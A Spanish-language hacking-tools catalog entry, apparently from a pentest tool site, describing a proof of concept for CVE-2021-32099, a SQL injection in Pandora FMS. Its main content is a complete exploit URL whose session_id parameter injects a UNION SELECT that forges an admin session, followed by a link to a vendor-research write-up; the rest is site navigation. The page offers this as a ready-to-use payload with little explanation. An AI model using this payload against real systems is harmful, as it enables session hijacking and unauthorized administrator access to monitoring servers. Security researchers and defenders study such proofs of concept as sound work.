¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!
Prueba de concepto del exploit para CVE-2021-32099, una vulnerabilidad de inyección SQL en Pandora FMS, que demuestra el secuestro de sesión mediante peticiones HTTP manipuladas.
Descubre las herramientas más usadas por nuestra comunidad.
Explora todas las herramientas
Explora nuestra colección de herramientas
poc : http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained